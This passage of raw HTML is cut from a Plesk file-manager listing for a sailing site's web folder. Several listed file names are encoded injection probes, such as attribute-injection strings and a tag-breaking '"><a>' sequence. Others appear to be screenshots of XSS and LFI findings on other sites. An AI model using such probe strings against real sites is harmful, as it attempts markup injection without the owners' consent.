href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25200fd28a9909b" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%202d0878db96d" value="%20a%3db%202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25202d0878db96d" onClick="return bin();;lon();">%20a%3db%202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%20c23f52e7ba1" value="%20a%3db%20c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%2520c23f52e7ba1" onClick="return bin();;lon();">%20a%3db%20c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%20c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%2520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_064a7066601" value="064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=064a7066601" onClick="return bin();;lon();">064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPG" value="1-lfi-mod.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();">1-lfi-mod.JPG</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPGfdf080d99066333a3eca3950" value="1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="return bin();;lon();">1-lfi-mod.JPGfdf080d99066333a3eca3950</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1dac1%2522a%253d%2522b%2522064a7066601" value="1dac1%2522a%253d%2522b%2522064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick="return bin();;lon();">1dac1%2522a%253d%2522b%2522064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/1dac1%2522a%253d%2522b%2522064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_25e31e30568" value="25e31e30568" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=25e31e30568" onClick="return bin();;lon();">25e31e30568</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/25e31e30568" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=25e31e30568" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F25e31e30568" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=25e31e30568" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2a790%253ca%253e05dd7ec7ca9" value="2a790%253ca%253e05dd7ec7ca9" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick="return bin();;lon();">2a790%253ca%253e05dd7ec7ca9</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/2a790%253ca%253e05dd7ec7ca9" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2ef80%2522%2520a%253db%2520c23f52e7ba1" value="2ef80%2522%2520a%253db%2520c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick="return bin();;lon();">2ef80%2522%2520a%253db%2520c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/2ef80%2522%2520a%253db%2520c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpg" value="302br.net-xss-2.jpg" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();">302br.net-xss-2.jpg</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpg" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpg" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" value="302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="return bin();;lon();">302br.net-xss-2.jpgfdf080d93392bd957db5b4d5</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3e50b%2522%253e%253ca%253e8f0ee00628" value="3e50b%2522%253e%253ca%253e8f0ee00628" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick="return bin();;lon();">3e50b%2522%253e%253ca%253e8f0ee00628</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/3e50b%2522%253e%253ca%253e8f0ee00628" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPG" value="3M.COM-XSS-1.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();">3M.COM-XSS-1.JPG</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="e(event);" 